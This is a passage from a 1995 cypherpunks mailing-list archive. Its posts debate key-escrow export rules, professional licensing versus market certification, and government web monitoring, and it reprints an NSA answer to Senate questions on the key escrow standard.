The breakout session that I was in was directly charged with this issue.
We talked at length about it. There were NIS&T and NSA folks at the session.
The consensus was that the Government wanted to prevent a version of PGP
that was export enabled (GAK and short keys) that would be backward
compatible.

The group stated strongly that this was a "non starter." That is,
it was unacceptable. Vendors wanted "sales appeal." That means
compatibility with existing software. And compatibility with existing
export-approved systems. [DES has been exported to "friendly" countries
with strict controls.]

And criterion #2 specifically outlawed superencryption.
No DES | TRAN | DES | TRAN | DES.
They were serious. Talk to CME, he was in that session.

I believe that this criterion is stupid, or at least ill-advised.
But the govies insisted.

All the more justification to ignore the US rules and develop
off-shore.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Wed, 13 Sep 95 21:26:13 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: cryptography eliminates lawyers?
Message-ID: <v01510104ac7d40ec670b@[198.59.115.127]>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote,
>On Wed, 13 Sep 1995, Dar Scott wrote:
>
>> Black Unicorn wrote,
[snip]

We seem to be having problems with the meanings of words.  For example, I
make a distinction between certification and licensing.  Also, I see
violence and coercion as being ultimately related to something physical.
I'm not sure what "proper", "competent to practice"... mean.  And I see a
big difference in a market based monopoly and a government based monopoly.


[snip]
>Didn't I just say this above?
>
>A centralized, or several centralized authorities.

I had assumed you meant by authority an agent of the state that is able to
invoke or otherwise wield the physical force of the state.  By certifying
entities I was referring to private organizations that had no similar power
or to government organizations that had only the power to provide
information.

By a licensing entity I was referring to an organization that can coerce to
prevent the unlicensed from doing the licensed behavior.  By coercion I
meant the threat of physical force or the force itself.  Though one might
think of physical force as applying to murder, kidnapping, slavery,
assault, robbery, physical theft, I would also apply it to theft or damage
of abstract property that has properties like physical property.  I intend
for these to apply to many actions of the state.

Perhaps I erred in applying "certification" and "license" to these
contrasting concepts, but I do think the distinction is important and the
observation that there are fuzzy areas in between does not remove that.

If I have a license from the local gang to sell drugs and the guy across
the street does not, I could encourage the gang to do something and the guy
might get shot.  Similarly, if I was a PE and my competitor across the
street was not, I could encourage the state to do something that--with
several stages of his lack of cooperation--results in his finding a gun in
his face or worse.

>I guess the center of my question is, how can you apply Web of Trust to
>e.g. a university degree.  Who cares what Bob and Alice think my degree
>is in, the client only wants to know from the institution.

It does not matter why people would trust a certifying entity.  It might
have a great earned reputation, it might "borrow" some reputation from
bonding or audits, or it might have ties to the Real World.

>  Licensing can only be done by an
>>      entity that can use physical force to prevent
>>      buying and selling legal services.
>
>I believe you are incorrect, but I guess my main concern is your
>characterization of "Physical force."  I am assuming you mean coercion,
>and not that you will be jailed or such (though this may be the case).
>
>I would argue that as long as coercion exists (violence of any type,
>physical or not) you have a licensing authority.  Take the Hollywood
>blacklist.  No one actually pushed around suspected pinko screenwriters
>(well, at least, if anyone did, it was incidental) but they certainly
>faced a great deal of persuasive motivation.  Look at the committee as
>the licensing authority here.  (Licensing you as a non-communist as it were).

It seems I am using coercion in a different sense.  Unless blacklisting has
physical force at its root enforcement mechanism it is not coercion and is
very fragile.

>If several governmental and private authorities were in the practice of
>certifying that Bob has a law degree from Tremont University, and that he
>is competent to practice in D.C., and given that the citizens of D.C.
>will look for these credentials, isn't this a license?  After all, Bob has
>to pass some test or requirement to get the signatures.  Isn't this
>coercion in your definition?

No.  I apologize for any confusion.

>Can't the multiple authorities set common
>or near common guidelines?  Rather, don't they HAVE to in order to have
>their signatures worth the electrons they are transmitted with?

In general, No.  Under many conditions market forces make services alike,
but more often competing businesses find particular market niches.  I would
expect that different certs would cover different levels of expertise,
different specializations and different breadths of specializations.  Any
lawyer might have a dozen certs.  I would not expect there to be a single
level of certification for all applications.  I know of several companies
in which the primary product designer has no engineering degree.

>If you take the extreme position you seem to, there's an antitrust case here.
I don't insist there has to be a variety.  I only desire that coercion does
not come into play in preventing it.  As I said, if a natural monopoly
forms at times, I am not worried.

>Am I not "licensing" my key signature to people provided they pass my key
>signature criteria?  Am I not doing violence by withholding my signature
>and the benefits it might convey for certain "terms?"
[snip]
>This is the trap of the licensing argument.

I see a big difference in withholding a signature and sending gunmen.
There is no violence in withholding a signature.

>The evil is not licensing, which I think serves a real purpose, but
>created convenience fees, taxation through the withholding of licensing
>and the use of other government largess.   I wrote a massive piece on this
>and sent it to the list about a year and a half ago.  With interest I will
>repost it.

Even if no one else is interested, I'd like to see it.

>The real question is how you decide what an authority to license is.  Is
>it to be dictated by government?  Or by market forces (i.e. the
>reputation of the licenser).

Yes, the government vs. market question is key, but I believe the answer is
in that distinction I used in contrasting terms "certification" and
"license".  The "who" is tied up in what the instrument is.

>> >I don't see how the net will eliminate the basic need for highly
>> >qualified professionals and the proof that they have credentials.
>>
>>      It won't.  The needs might shift a little but they
>>      will be there.
>
>Then why will lawyers, or a 'professional monopoly' be broken?
The meaning of "qualified professional" and "credentials" will be
market-based and multidimensional, not defined by the state or a group
already "qualified" using the state for enforcement.

[snip]
Concerning a market-based monopoly,
>>      Not so bad if it happens,
>>      but much more honest, efficient and softer-edged
>>      than "licensed to practice".
>
>I'm not so sure.  There will be a tremendous amount of corporate power in
>these authorities, and if (as you seem to be saying a few paragraphs up) it
>is hard to break into the trusted certification business, there is a
>monopoly again.
I don't really think this is a problem.  It is the force-based monopoly and
specifically the government-based monopoly I have a problem with.

[snip]
>Like the several state Bars?
The market advantage is slight.

[snip]
>So you have essentially admitted that a central authority is required?
>Or will be more often used?
Not required.

[snip]
>If your definition of license is simply who does the coercing, I think you
>should reconsider.

Whatever the word used, I see the distinction between 1) the assertion of
certain information and 2) the threat of force as being key.

Perhaps, I could have used the phrases "non-coercion-based" licensing and
"coercion-based" licensing, but I am not comfortable with these--trade
licensing invokes too violent of an image.

A note to all in government licensed trades:  I recognize that licensing is
part of the real world we live in.  Often one has to be licensed to
practice a favorite trade.  I do not mean to describe the licensed
themselves as violent.

Dar


===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Thu, 14 Sep 95 17:28:55 PDT
To: cypherpunks@toad.com
Subject: Re: Digital Fingerprinting
Message-ID: <199509140335.UAA13203@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
>> Why do I feel like I'm sitting on the group W bench?
>
>I don't know, kid, what you in for?
MacN

I said, "Velveeta," and they all moved away. "And, using a
PGP signed message, through a chained MIXMASTER remailer to
help Phil Z.," and they all came back, and we was talking about
packet-sniffing, reputation markets, key cracking, ITAR, 
IP spoofing, Diffie-Hellman session keys, RC4, MD5, and all
those wonderful things right there on the group W bench...

--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damion.furi@the-matrix.com (DAMION FURI)
Date: Wed, 13 Sep 95 21:28:40 PDT
To: cypherpunks@toad.com
Subject: (NOISE) Re: White House M
In-Reply-To: <8B1023A.000504FC46.uuout@the-matrix.com>
Message-ID: <8B10562.000504FFB4.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



 |>         Maybe so, but we don't have to like it.  And I don't.  But
 |>         it's not so much their access, per se, that I object to.
F|Why the hell do you care ?  Someone has a home page for something on the Web.
 |Someone at the White House looks at it. So what ?  You object to the fact
 |that somebody in the government has a Web browser and *gasp* uses it to read
 |stuff on the WWW ???

        What did I just write?  It's not so much their access...

 |> It's their potential intentions,
F|You take moral offense to what you think someone else _might_ be thinking ?

        Not normally, no.  But I've found a number of reasons to take
        offense at more overt government actions, and I see no reason
        not to take offense at obscure government actions.

        Especially when it involves spooks (NSA, DOD, military branch
        agencies, CIA, FBI, DEA, alphabet soup agency of choice).

 |Sounds like you believe in thoughtcrime. Banned any good books lately ?

        I _DO_ believe in thoughtcrime.  I think it's a goddamned crime
        when some dickhead with more power than sense attempts to limit
        the actions of private citizens, in complete disregard for the
        idea of "presumed innocent until proven guilty."  If someone so
        much as THINKS this, I have a problem with them.

        Now, go fuck yourself.

F|>  all things considered, and
 |>         the fact that they aren't at all open about such monitoring.
F|This is absurd. You expect the White House to issue a press release every time
 |a staffer clicks on a URL ?

        No.  I want to know what they're monitoring on a general
        basis and why.  It's my tax money, too.  But they aren't
        open about the monitoring.  Half the time they deny doing
        it at all, and the rest of the time they come up with a
        few dozen specious excuses.


        furi@the-matrix.com    pgp-public-key@demon.co.uk    C1225CE1
  RADical 1 Systems - Multi-Platform Custom Programming, Service, & Support






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 13 Sep 95 20:52:48 PDT
To: cme@acm.org
Subject: Re: CAGK rationale (was: Re: GAK/weak crypto rationale?)
In-Reply-To: <9509132212.AA28200@tis.com>
Message-ID: <Pine.D-G.3.91.950913230550.5486E-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Sep 1995 cme@acm.org wrote:

> >Date: Tue, 12 Sep 1995 17:52:22 -0400 (EDT)
> >From: Brian Davis <bdavis@thepoint.net>
> 
> >  In our district, we 
> >managed to convict almost 20 people in an investigation of the state 
> >legislature, including the now-former Speaker of the House and > 6 other 
> >legislators.  Bribing lobbyists took hits, etc.
> >
> >Particularly effective were the court-approved video and audio tapes of 
> >the Speaker taking a bribe in exchange for certain action on legislation 
> >and responding to the bribing party:   "Well bless your heart."
> >That has become the office's mantra.
> 
> Clearly, the world needs CAGK -- Citizen Access to Government Keys -- with
> all gov't officials forced to use keys held by various newspapers and
> other watchdog agencies....
> 
> The video and audio bugs aren't part of the wiretap process so they don't
> apply here.
>

You need to reread Title III.  The same law applies.  And when encryption 
defeats all wiretaps, there will likely be more  "interceptions of oral 
communications."  That is, bugs.  And that's something I hadn't thought 
of until just now.

EBD


 
>  - Carl
> 
> +--------------------------------------------------------------------------+
> |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
> |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
> |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
> +----------------------------------------------------------- Jean Ellison -+
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Wed, 13 Sep 95 21:16:44 PDT
To: cypherpunks@toad.com
Subject: Need ideas. NFP to monitor law enforcement on the net.
Message-ID: <v01510103ac7d68d0b158@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dear cpunks,

after reading several articles about government sting operations in the US
and Bavaria, I'm thinking of starting a not for profit to collect and
disseminate information on law enforcement on the net. I know how to register
a NFP Corp, and certainly know about mailing lists and web pages, but other
problems still remain to be solved. Specifically:

1) Is it better to be a national or state registered NFP? (Given the level
of LEA hassling I might experience.)

2) What if I start a mailing list and nobody shows up? Whose participation
should I ensure so that the effort is a success?

3) What are some good sources of information for LEA's on the net?

Any suggestions would be most welcome.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMFe6MnIf3YegbdiBAQHmeAJYz4bKtqPJvcdyUxcuVEOVgAYNO3sRuUzW
lnYnq7o2qBMcePAW8xTVECmwt8DXTbutSTJC10DBHdyjDGdgdwwN3ne0mCWN7Pig
uDUk
=W0pp
-----END PGP SIGNATURE-----

Dietrich J. Kappe | Red Planet    http://www.redweb.com/
Red Planet, L.L.C.|         "Chess Space"              /chess
1-800-RED 0 WEB   |      "MS Access Products"          /cobre
Web Publishing    |        PGP Public Key              /goedel/key.txt







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 14 Sep 95 19:29:27 PDT
To: Jiri Baum <jirib@cs.monash.edu.au>
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <199509130156.LAA29400@molly.cs.monash.edu.au>
Message-ID: <Pine.BSD.3.91.950913234317.9083H-100000@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 13 Sep 1995, Jiri Baum wrote:
> 
> I feel I should point out that you have no proof that the text you have
> attributed to me was in fact posted by me, and in fact you have reason
> to believe otherwise since I usually PGP-sign my entire post including
> any signature.
> 

Wasn't a flame my friend.....wasn't meant as one either.

> Off topic, but I have been publicly accused so I feel I should publicly
> respond in the same forum.
> 

no problem :-^)

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 13 Sep 95 21:10:20 PDT
To: cypherpunks@toad.com
Subject: [Meeting at Tim's house participant] Who wanted the AT&T UNIX for 8086/80286 ?
Message-ID: <199509140407.AAA12906@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Would the person who expressed interest in my collection of genuine AT&T
UNIX for the AT&T 6300 (an 8086) and 6300 Plus (an 80286) complete with
several shelf feet hard cover documentation as well as the developer kit
please get in touch with me?

As for the rest of you: you may stop laughing now ;-)

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMFeqlyoZzwIn1bdtAQEkswF/dxu8jYNFjLVRK+3SbNy9ee2fc4xzsro6
elH7VHUX85Y/23EQmL0wBoVkAyqHKk0Z
=uYSW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Scanlon <tfs@vampire.science.gmu.edu>
Date: Wed, 13 Sep 95 22:17:21 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509130255.AA03446@sulphur.osf.org>
Message-ID: <9509140517.AA01328@vampire.science.gmu.edu>
MIME-Version: 1.0
Content-Type: text/plain



I know a few folks at eop, and I can tell you that
it's a tad bigger setup than a few boxes in bill's
private office.

This is the "office" of the executive, not "the executive office".
There's a good amount of people who work there. Most of them
are good folks too. They are not power hungry nuts, they are not
bad clones of "The Monroes", they are not weirdos like "Cancer Man"
out of the X-Files, in fact, in many cases they are just real normal
people who believe in trying to do something for their fellow citizens.
They don't *do* partisan politics, and in fact, partisan politics
are the greatest source of fear for their job security.

I've watched a lot of *good* people, by ANYONE'S standards,
leave their jobs in the government lately due to the lack of
support they have gotten from the congress & the executive branch,
and I know how bad morale is in places where everyone would
be better served if people didn't have to worry about how
to feed the kids next month.

Don't get me wrong, I don't agree with a lot of *political*
stuff that's going on at all. But the idea of some poor sod
worrying about his job because he decided to check out a
web site with "controversial" material is enough to make
me vomit.

Attributing a conspiracy to this is just plain and simple
ignorance. Any agency worth much wouldn't "monitor" from
a site with a big 'ol .gov at the end of the IP. THEY aren't
that stupid, but apparently the whackos in the woodpile
think that people would be that dumb.

Personally I'd be flattered if some gov site were looking at
"dissident" material I put up, if I chose to do that, God knows
it might actually mean my elected representatives were listening,
or at least their staff might be.

I swear, Clinton "scandals" make me nostalgic for the 'ol
republican days when we had REAL scandals like Watergate
& Iran-Contra... All this Foster crap & black helicopters
just strikes me as goofy, and in some cases ignorantly
obnoxious. I guess this is what happens when the trailer park
crowd gets on the net...


Tim



________________________________________________________________
tfs@vampire.science.gmu.edu (NeXTmail, MIME)  Tim Scanlon
George Mason University     (PGP key avail.)  Public Affairs
I speak for myself, but often claim demonic possession




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Wed, 13 Sep 95 23:36:59 PDT
To: cypherpunks@toad.com
Subject: Re: An opportunity not to be missed
Message-ID: <199509140636.BAA08330@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>It has occurred to me with the approach of the presidential campaign
>in the US (and its attendant press frenzy), that there is an
>unprecedentedly vast opportunity to bring certain items on the
>cypherpunk platform into the public spotlight.
[...]
>     Candidate Posturing                    Required Spin
>     -----------------------------------------------------------------
>     Pro-business, tough on crime           anonymous crime tip e-mail
>                                            a la Fed whistleblower stuff,
>                                            and the SPA
[...]

Now that you mention it, it seems to me that completely anonymous tipsters
with the ability to receive ecash rewards would likely be a bigger boon to
law enforcement types than would easily tappable communications lines.  
Is anyone in a position to set up a cypherpunks CrimeStoppers mailbox (for
use through the remailers)?  You could set up a web-page with instructions
and a list of crimes for which there are rewards.  Perhaps some civic
organizations would be willing to donate money for tips leading to arrests
and convictions of any crimes.  Even if it doesn't catch any bad guys, it'd be
great PR for strong crypto, anonymity, ecash and whoever runs it.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Tcmay@got.net)
Date: Wed, 20 Sep 95 17:54:47 PDT
To: cypherpunks@toad.com
Subject: RE: AN OPPORTUNITY NOT TO BE MISSED
Message-ID: <9509201551146661@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Wed, 13 Sep 1995 19:25:24 -0700
To: cypherpunks@toad.com
From: tcmay@got.net (Timothy C. May)
Subject: Re: An opportunity not to be missed

At 1:57 AM 9/14/95, Bill Stewart wrote:

>Is Wavy Gravy running his "Nobody for President" campaign again this time?
>After all, Nobody's going to balance the budget, and Nobody's going to
>get the government out of your bedroom, and on the internet, Nobody can tell
>if you're a dog or not :-)

Or to update it for today:

"Nobody@remailer.org for President."


--Tim

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 14 Sep 95 02:26:05 PDT
To: cypherpunks@toad.com
Subject: AOL Porno
Message-ID: <Pine.SUN.3.91.950914051946.8806B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Will the federal prosecutors and Fibbies on this list please 
emphasize that the Internet was not involved in the AOL kiddie porn 
case.  The Internet has enough opportunities for bad publicity as 
it is.

DCF

"Who wonders:  How it is that CompuServe was able to exist from 1979 
to the arrival of Prodigy and AOL without major sex, and drugs, and 
rock and roll problems?"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Thu, 14 Sep 95 04:57:54 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: cryptography eliminates lawyers?
Message-ID: <v01510107ac7db81f6880@[198.59.115.127]>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote,
[snip]
>> We seem to be having problems with the meanings of words.  For example, I
>> make a distinction between certification and licensing.
>
>Which, as I have indicated, I see as a "distinction without a difference."

We're at a standoff here.

[snip]
>So you wouldn't consider the Hollywood blacklist coercive?
>What about revocation of tax free status?
Not as you describe it.  No.

[snip]
>
>> And I see a
>> big difference in a market based monopoly and a government based monopoly.
>>
>
>Which, I think, is your key error- particularly in the context of this
>licensing issue, where the difference is nearly invisible.
This is our standoff.

[snip]
>I think your hangup is one of overdemonizing the state to the point where
>no other evils seem to exist.
Actually, I think that much coercion (as I used it) is outside the state.
I also believe there is much evil outside of coercion but that is probably
outside the scope of the topic.  I do admit that I am emphasizing coercion
and using that as the dividing line more than other types of evil.

[snip]
>  Though one might
>> think of physical force as applying to murder, kidnapping, slavery,
>> assault, robbery, physical theft, I would also apply it to theft or damage
>> of abstract property that has properties like physical property.  I intend
>> for these to apply to many actions of the state.
>
>I think you have failed to apply them to other organizations.  Again, I
>think you are over-enamoured with hating "the state."  Many organizations
>not affiliated with government do violence to abstract properties.

I referred to the physical force used by gangs to enforce neighborhood
rules.  After pondering this, I think this does not apply to my approach.
The state is brought up because it is the agent of coercion in licensing.

[snip]
>If I am a producer in a horizontal territory limitation agreement for
>sales of widgets, and bob is not, bob's attempt to move into my area and
>sell widgets will be met with a boycott by all the members of my
>agreement.  Is this any less coercion?  I understand the violence is
>fairly dramatic coercion, but it is hardly the only coercion.  Do you not
>consider the Clipper program coercion?
The first is not.  The Clipper program (as I understand it) is.  Remember,
my guideline is simple threat of physical harm.


>I suggest you take a look at Nozick, Coercion, in Philosophy, Science and
>Method  (S. Morgenbesser ed. 1969) or Zimmerman, Coercive Wage Offers, 10
>Phil & Pub. Aff. 121 (1981)  Also, see Kreimer, Allocational Sanctions:
>The Problem of Negative Rights in a Positive State, 132 U. Pa. L. Rev.
>1293 (1984).
I'll look for Nozick.

[snip]
>> >I guess the center of my question is, how can you apply Web of Trust to
>> >e.g. a university degree.  Who cares what Bob and Alice think my degree
>> >is in, the client only wants to know from the institution.
>>
>> It does not matter why people would trust a certifying entity.  It might
>> have a great earned reputation, it might "borrow" some reputation from
>> bonding or audits, or it might have ties to the Real World.
>
>Exactly, it must be tied to some kind of authority.  In this case, the
>issuing institution is about the only acceptable one.
>
>I stand by the contention that a University degree cannot be certified
>acceptably by an authority not in some way connected to the University.
I think such a certification is consistent with my desire for a lack of
physical coercion in this.  I assume you'd be willing to let the market
prove this point.

[snip]
>You are using coercion in a different sense.  One of the definitions I
>get in Webster's (while force is incorporated in some others) is "to
>compel to do something by the use of power, intimidation or threats."
>
>If you prefer that I use "serious persuasion" instead, fine, but I think
>you are just splitting hairs.
I think there is a big difference between "I'm going to break your house
windows unless you give me $50" and "I'm going to stop delivering milk
unless you pay your $50 milk bill".

[snip]
>Do you believe it impossible/insignificant to manipulate behavior by
>persuasive means other than violence or the threat of actual physical
>violence?
No.  And for me there are cases when it would be wrong.  I won't comment on
when it is wrong for others, but in the alternate case that includes
violence or the threat, I will say it is wrong.

>> >Can't the multiple authorities set common
>> >or near common guidelines?  Rather, don't they HAVE to in order to have
>> >their signatures worth the electrons they are transmitted with?
>>
>> In general, No.  Under many conditions market forces make services alike,
>> but more often competing businesses find particular market niches.
>
>An example please?  With specific regard to certifying authorities and
>university degrees?
A BA and BS have become practically the same, but a BSET (tech) is very
different from a BSEE (engineer).

[snip]
>I still am having trouble understanding your definition of coercion.
[snip]
>> I see a big difference in withholding a signature and sending gunmen.
>> There is no violence in withholding a signature.
>
>There is no PHYSICAL violence, this I have admitted, but the economic
>violence of such an act can be significant.  It seems that for you the
>distinction is in the emotional effect of the application of persuasive
>force, rather than the effect.
Oh. You are right in the last part.  The distinction is NOT the effect.
Not the emotional effect either.  It is the ethics and pragmatics of
relying on a competition of ideas and not force.  To put it bluntly,
coercion (as I defined it: murder, theft, ...and the threat thereof) is a sin.


[snip]
>Allowing emotion to cloud one's judgement of what is and is not coercive
>is a mistake.
Agreed.  I have clear guidelines.

>I believe that your defining the words merely to distinguish who the
>certifying authority is confusing- and deceptive.
The concepts of coercive methods and noncoercive methods are there
regardless of the words.  I prefer agents of the first over agents of the
latter.

[snip]
>[market monopolies are "softer" than government ones.]
[Agreed.]

[snip]
>The base requirement of a certification from an education institution
>(for which you have provided no substitute).
Let the market decide if there really is one.
>The existence of a floor, below which it is impractical to practice a
>profession and the existence of a set of entities (of whatever number)
>whose signatures are required to transcend this floor.
Let the market decide.

[snip]
>> Perhaps, I could have used the phrases "non-coercion-based" licensing and
>> "coercion-based" licensing, but I am not comfortable with these--trade
>> licensing invokes too violent of an image.
>
>I think this construction is still flawed.  I will remain by my position
>that licensing is useful when not used to collect taxes or
>otherwise overregulate.  I also hold that the distinctions you make
>between licensing and certification are without functional difference in
>effect and are deceptive in that they suggest a significant difference in
>effect or purpose where there is none.
>
The difference in effect is in emergent market optimization.  The
difference in purpose is ethical.

I have learned that you--and perhaps others--do not see an important
difference in these two styles of influencing behavior.  I see a major
difference and in thinking the difference was obvious was slow in
understanding your position.

Great.  You're already enjoying breakfast and I still have to go to bed.

Dar

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 14 Sep 95 03:01:28 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <Pine.SUN.3.91.950913180804.6269A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.950914054153.8806C-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 13 Sep 1995, Black Unicorn wrote:

> But won't clients insist on proper credentials in one form or another?  
> Doesn't the practicality and accountability of a centralized authority 
> (or several authorities) provide the best answer to this?  Who is going 
> to accept my signature promising that I did indeed get a law degree and 
> pass the bar?

An educational institution can certify its own graduates --- it does 
now.  Competing credentialing institutions is exactly what I would be 
looking for as opposed to today's coercive monopoly.

No matter how skilled, it is illegal for an unlicensed person to practice 
law, medicine, or many other professions in any state.  The nets weaken 
these restrictions because they allow action at a distance.

Note the other effects of the nets.  They make it hard to tell that you 
*are* working which reduces the impact of regulations of work by 
"illegal aliens."  Thus if I am wandering through the South of France 
while writing the 'Great American Novel' I am unlikely to get busted for 
violation of work restrictions.  The nets expand the number of jobs I 
can do while innocently wandering the South of France.  I can or will 
soon be able, for example, to manage a large international corporation 
from anywhere.

DCF

"Who actually prefers Le Massif Central to those hot and crowded southern 
climes." 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 13 Sep 95 21:25:54 PDT
To: cypherpunks@toad.com
Subject: NSA on GAK
Message-ID: <199509140420.GAA10736@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



The opening comments here by Admiral McConnell of the NSA appear to
parallel the comments of Mr. Michael Nelson at the September 6 NIST
Key Escrow meeting on the use of encryption by "spies, terrorists,
and criminals."


URL: http://csrc.ncsl.nist.gov/secnews/ees_q-a.txt

----------

Note:  The following answers were provided by NSA to the Senate
Subcommittee on Technology and the Law in response to their
follow-up questions to the May 3, 1994 hearings.

                   ---------------------------

          Senate Subcommittee on Technology and the Law
 Hearing on the Administration's Key Escrow Encryption Standard

        Written Questions for Vice Admiral McConnell, NSA

*Questions for Senator Pressler:

Q:   Admiral, as you are aware, critics of the Administration's
proposal argue that as a practical matter, no criminal, foreign
spy, or terrorist of any sophistication would be foolish enough to
use an encryption device designed by the NSA and approved by the
FBI.

How do you respond? Why do[n't you] think the people whose
telecommunications the NSA and the FBI want most to decode will be
the very people most unlikely to use this technology?

Answer:   From what we know today, the overriding requirement that
spies, terrorists, and criminals have is for readily available and
easy to use equipment that interoperates.  Key escrow encryption is
not meant to be a tool to catch criminals.  It will make excellent
encryption available to legitimate businesses and private citizens
without allowing criminals to use the telecommunications system to
plan and commit crimes with impunity.  We believe it would be
irresponsible for government to make excellent encryption broadly
available knowing that its use by criminals would make it
impossible for law enforcement agencies to conduct lawful wiretaps
against them.

The Department of Justice credits information gleaned through
wiretaps as leading to more than 20,000 felony convictions since
the early 1980s.  This would not have been possible if the
criminals had been using encryption systems the FBI could not
break.

Without government action, however, this fortunate situation
will change.  At present most people, and most criminals, don't use
encryption.  However, there is an increasing public awareness of
the value of encryption for protecting private personal and
business communications.  Increasing demand for encryption by the
public will likely lead to the widespread use of some form of
standardized encryption on the public telecommunications network.

This development would have great benefits for the country.
Legitimate businesses and private individuals could use the
telecommunications system secure in the knowledge that their
private information such as business records and credit card
numbers could not be intercepted by third parties.

But there is a down side.  Criminals, terrorists, and others
could also use the system to plan crimes, launder money, and the
like, completely secure in the knowledge that law enforcement
agencies could not listen to those communications.  Just as
legitimate businesses operate much more efficiently and effectively
using the telecommunications system than they could without it, so
